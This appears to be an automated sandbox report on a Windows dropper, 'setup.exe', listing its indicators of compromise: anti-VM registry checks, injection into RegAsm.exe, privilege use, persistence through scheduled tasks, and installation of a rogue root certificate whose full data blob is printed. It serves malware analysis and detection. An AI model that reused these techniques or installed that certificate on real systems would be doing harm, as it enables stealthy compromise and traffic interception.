schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2268	schtasks.exe
2944	schtasks.exe
2820	schtasks.exe
1956	schtasks.exe
4468	schtasks.exe
4380	schtasks.exe
4720	schtasks.exe
2416	schtasks.exe
1888	schtasks.exe
1604	schtasks.exe
2008	schtasks.exe
3924	schtasks.exe
1592	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exerundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 330 Go-http-client/1.1
HTTP User-Agent header 324 Go-http-client/1.1
HTTP User-Agent header 325 Go-http-client/1.1
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2388 taskkill.exe

description	flow	ioc
HTTP User-Agent header	330	Go-http-client/1.1
HTTP User-Agent header	324	Go-http-client/1.1
HTTP User-Agent header	325	Go-http-client/1.1

pid	process
2388	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exewindefender.exetuZctSq25Sx46OCwloIdBXYG.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeKRtjXHn.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{adc6c6aa-0000-0000-0000-d01200000000}\MaxCapacity = "14116"	KRtjXHn.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2181 = "Astrakhan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	tuZctSq25Sx46OCwloIdBXYG.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

GIRYqcKiZvhmj93nqNmYBOcU.exes4AaUwLl6DEajYQi5WVeMPx0.exeNYulW0N4e1hPawIOp4plsa35.exeK3WDl2xWvNNnkfn4nYdQExzq.exee02CHlRDyVx8CisrSUbTQs_u.exekwI5msI0GXCECMxCfATKQ50A.exeRegAsm.exepowershell.exedckuybanmlgp.exeMsBuild.exepowershell.exepowershell.exepowershell.exetuZctSq25Sx46OCwloIdBXYG.exepowershell.exetuZctSq25Sx46OCwloIdBXYG.exe

pid	process
4964	GIRYqcKiZvhmj93nqNmYBOcU.exe
4964	GIRYqcKiZvhmj93nqNmYBOcU.exe
3520	s4AaUwLl6DEajYQi5WVeMPx0.exe
3520	s4AaUwLl6DEajYQi5WVeMPx0.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
2668	K3WDl2xWvNNnkfn4nYdQExzq.exe
2668	K3WDl2xWvNNnkfn4nYdQExzq.exe
4492	e02CHlRDyVx8CisrSUbTQs_u.exe
4492	e02CHlRDyVx8CisrSUbTQs_u.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
2784	RegAsm.exe
2784	RegAsm.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
468	powershell.exe
468	powershell.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
468	powershell.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
4648	NYulW0N4e1hPawIOp4plsa35.exe
3548	dckuybanmlgp.exe
3548	dckuybanmlgp.exe
3548	dckuybanmlgp.exe
3548	dckuybanmlgp.exe
3548	dckuybanmlgp.exe
3548	dckuybanmlgp.exe
3548	dckuybanmlgp.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
4320	kwI5msI0GXCECMxCfATKQ50A.exe
3548	dckuybanmlgp.exe
2784	RegAsm.exe
2784	RegAsm.exe
2784	RegAsm.exe
2784	RegAsm.exe
4304	MsBuild.exe
4304	MsBuild.exe
2100	powershell.exe
2100	powershell.exe
2100	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
3488	tuZctSq25Sx46OCwloIdBXYG.exe
3488	tuZctSq25Sx46OCwloIdBXYG.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe
580	tuZctSq25Sx46OCwloIdBXYG.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

672

pid	process
672

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

RegAsm.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeMsBuild.exeWMIC.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	2784	RegAsm.exe
Token: SeDebugPrivilege	468	powershell.exe
Token: SeShutdownPrivilege	3516	powercfg.exe
Token: SeCreatePagefilePrivilege	3516	powercfg.exe
Token: SeShutdownPrivilege	1748	powercfg.exe
Token: SeCreatePagefilePrivilege	1748	powercfg.exe
Token: SeShutdownPrivilege	4588	powercfg.exe
Token: SeCreatePagefilePrivilege	4588	powercfg.exe
Token: SeShutdownPrivilege	3744	powercfg.exe
Token: SeCreatePagefilePrivilege	3744	powercfg.exe
Token: SeDebugPrivilege	4304	MsBuild.exe
Token: SeBackupPrivilege	4304	MsBuild.exe
Token: SeSecurityPrivilege	4304	MsBuild.exe
Token: SeSecurityPrivilege	4304	MsBuild.exe
Token: SeSecurityPrivilege	4304	MsBuild.exe
Token: SeSecurityPrivilege	4304	MsBuild.exe
Token: SeIncreaseQuotaPrivilege	556	WMIC.exe
Token: SeSecurityPrivilege	556	WMIC.exe
Token: SeTakeOwnershipPrivilege	556	WMIC.exe
Token: SeLoadDriverPrivilege	556	WMIC.exe
Token: SeSystemProfilePrivilege	556	WMIC.exe
Token: SeSystemtimePrivilege	556	WMIC.exe
Token: SeProfSingleProcessPrivilege	556	WMIC.exe
Token: SeIncBasePriorityPrivilege	556	WMIC.exe
Token: SeCreatePagefilePrivilege	556	WMIC.exe
Token: SeBackupPrivilege	556	WMIC.exe
Token: SeRestorePrivilege	556	WMIC.exe
Token: SeShutdownPrivilege	556	WMIC.exe
Token: SeDebugPrivilege	556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	556	WMIC.exe
Token: SeRemoteShutdownPrivilege	556	WMIC.exe
Token: SeUndockPrivilege	556	WMIC.exe
Token: SeManageVolumePrivilege	556	WMIC.exe
Token: 33	556	WMIC.exe
Token: 34	556	WMIC.exe
Token: 35	556	WMIC.exe
Token: 36	556	WMIC.exe
Token: SeIncreaseQuotaPrivilege	556	WMIC.exe
Token: SeSecurityPrivilege	556	WMIC.exe
Token: SeTakeOwnershipPrivilege	556	WMIC.exe
Token: SeLoadDriverPrivilege	556	WMIC.exe
Token: SeSystemProfilePrivilege	556	WMIC.exe
Token: SeSystemtimePrivilege	556	WMIC.exe
Token: SeProfSingleProcessPrivilege	556	WMIC.exe
Token: SeIncBasePriorityPrivilege	556	WMIC.exe
Token: SeCreatePagefilePrivilege	556	WMIC.exe
Token: SeBackupPrivilege	556	WMIC.exe
Token: SeRestorePrivilege	556	WMIC.exe
Token: SeShutdownPrivilege	556	WMIC.exe
Token: SeDebugPrivilege	556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	556	WMIC.exe
Token: SeRemoteShutdownPrivilege	556	WMIC.exe
Token: SeUndockPrivilege	556	WMIC.exe
Token: SeManageVolumePrivilege	556	WMIC.exe
Token: 33	556	WMIC.exe
Token: 34	556	WMIC.exe
Token: 35	556	WMIC.exe
Token: 36	556	WMIC.exe
Token: SeShutdownPrivilege	4480	powercfg.exe
Token: SeCreatePagefilePrivilege	4480	powercfg.exe
Token: SeShutdownPrivilege	1908	powercfg.exe
Token: SeCreatePagefilePrivilege	1908	powercfg.exe
Token: SeShutdownPrivilege	5088	powercfg.exe
Token: SeCreatePagefilePrivilege	5088	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

wup.exe

pid process

4944 wup.exe

pid	process
4944	wup.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exe4dLTrXqtftUhIwJTRyHSSejV.exeQcMIl6J7oMLzdIxc7BHVgaQ9.exe9YVd8Opjg5kP29QMElKldZkn.exe

description	pid	process	target process
PID 4756 wrote to memory of 2668	4756	setup.exe	K3WDl2xWvNNnkfn4nYdQExzq.exe
PID 4756 wrote to memory of 2668	4756	setup.exe	K3WDl2xWvNNnkfn4nYdQExzq.exe
PID 4756 wrote to memory of 2668	4756	setup.exe	K3WDl2xWvNNnkfn4nYdQExzq.exe
PID 4756 wrote to memory of 3520	4756	setup.exe	s4AaUwLl6DEajYQi5WVeMPx0.exe
PID 4756 wrote to memory of 3520	4756	setup.exe	s4AaUwLl6DEajYQi5WVeMPx0.exe
PID 4756 wrote to memory of 3520	4756	setup.exe	s4AaUwLl6DEajYQi5WVeMPx0.exe
PID 4756 wrote to memory of 4492	4756	setup.exe	e02CHlRDyVx8CisrSUbTQs_u.exe
PID 4756 wrote to memory of 4492	4756	setup.exe	e02CHlRDyVx8CisrSUbTQs_u.exe
PID 4756 wrote to memory of 4492	4756	setup.exe	e02CHlRDyVx8CisrSUbTQs_u.exe
PID 4756 wrote to memory of 4884	4756	setup.exe	4dLTrXqtftUhIwJTRyHSSejV.exe
PID 4756 wrote to memory of 4884	4756	setup.exe	4dLTrXqtftUhIwJTRyHSSejV.exe
PID 4756 wrote to memory of 4884	4756	setup.exe	4dLTrXqtftUhIwJTRyHSSejV.exe
PID 4756 wrote to memory of 2772	4756	setup.exe	oqnIhEuqPWFLxfGfy_cozJKr.exe
PID 4756 wrote to memory of 2772	4756	setup.exe	oqnIhEuqPWFLxfGfy_cozJKr.exe
PID 4756 wrote to memory of 2772	4756	setup.exe	oqnIhEuqPWFLxfGfy_cozJKr.exe
PID 4756 wrote to memory of 2104	4756	setup.exe	gNaZnn5CLFQicjVhsTk8gKef.exe
PID 4756 wrote to memory of 2104	4756	setup.exe	gNaZnn5CLFQicjVhsTk8gKef.exe
PID 4756 wrote to memory of 2104	4756	setup.exe	gNaZnn5CLFQicjVhsTk8gKef.exe
PID 4756 wrote to memory of 3116	4756	setup.exe	kN3Wu8RUu2uTrcf2g49JbbJI.exe
PID 4756 wrote to memory of 3116	4756	setup.exe	kN3Wu8RUu2uTrcf2g49JbbJI.exe
PID 4756 wrote to memory of 3116	4756	setup.exe	kN3Wu8RUu2uTrcf2g49JbbJI.exe
PID 4756 wrote to memory of 2268	4756	setup.exe	D3wSlOtntlkjBD387yaruAqa.exe
PID 4756 wrote to memory of 2268	4756	setup.exe	D3wSlOtntlkjBD387yaruAqa.exe
PID 4756 wrote to memory of 2268	4756	setup.exe	D3wSlOtntlkjBD387yaruAqa.exe
PID 4756 wrote to memory of 4744	4756	setup.exe	QcMIl6J7oMLzdIxc7BHVgaQ9.exe
PID 4756 wrote to memory of 4744	4756	setup.exe	QcMIl6J7oMLzdIxc7BHVgaQ9.exe
PID 4756 wrote to memory of 4744	4756	setup.exe	QcMIl6J7oMLzdIxc7BHVgaQ9.exe
PID 4756 wrote to memory of 4320	4756	setup.exe	kwI5msI0GXCECMxCfATKQ50A.exe
PID 4756 wrote to memory of 4320	4756	setup.exe	kwI5msI0GXCECMxCfATKQ50A.exe
PID 4756 wrote to memory of 4320	4756	setup.exe	kwI5msI0GXCECMxCfATKQ50A.exe
PID 4756 wrote to memory of 1368	4756	setup.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
PID 4756 wrote to memory of 1368	4756	setup.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
PID 4756 wrote to memory of 1368	4756	setup.exe	P1i57rTqyYvK8Wz1_NY_lX0m.exe
PID 4756 wrote to memory of 4964	4756	setup.exe	GIRYqcKiZvhmj93nqNmYBOcU.exe
PID 4756 wrote to memory of 4964	4756	setup.exe	GIRYqcKiZvhmj93nqNmYBOcU.exe
PID 4756 wrote to memory of 4964	4756	setup.exe	GIRYqcKiZvhmj93nqNmYBOcU.exe
PID 4756 wrote to memory of 3488	4756	setup.exe	tuZctSq25Sx46OCwloIdBXYG.exe
PID 4756 wrote to memory of 3488	4756	setup.exe	tuZctSq25Sx46OCwloIdBXYG.exe
PID 4756 wrote to memory of 3488	4756	setup.exe	tuZctSq25Sx46OCwloIdBXYG.exe
PID 4756 wrote to memory of 884	4756	setup.exe	9YVd8Opjg5kP29QMElKldZkn.exe
PID 4756 wrote to memory of 884	4756	setup.exe	9YVd8Opjg5kP29QMElKldZkn.exe
PID 4756 wrote to memory of 884	4756	setup.exe	9YVd8Opjg5kP29QMElKldZkn.exe
PID 4756 wrote to memory of 4648	4756	setup.exe	NYulW0N4e1hPawIOp4plsa35.exe
PID 4756 wrote to memory of 4648	4756	setup.exe	NYulW0N4e1hPawIOp4plsa35.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 4884 wrote to memory of 4088	4884	4dLTrXqtftUhIwJTRyHSSejV.exe	RegAsm.exe
PID 884 wrote to memory of 4784	884	9YVd8Opjg5kP29QMElKldZkn.exe	is-VK0NS.tmp
PID 884 wrote to memory of 4784	884	9YVd8Opjg5kP29QMElKldZkn.exe	is-VK0NS.tmp
PID 884 wrote to memory of 4784	884	9YVd8Opjg5kP29QMElKldZkn.exe	is-VK0NS.tmp
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe
PID 4744 wrote to memory of 2784	4744	QcMIl6J7oMLzdIxc7BHVgaQ9.exe	RegAsm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
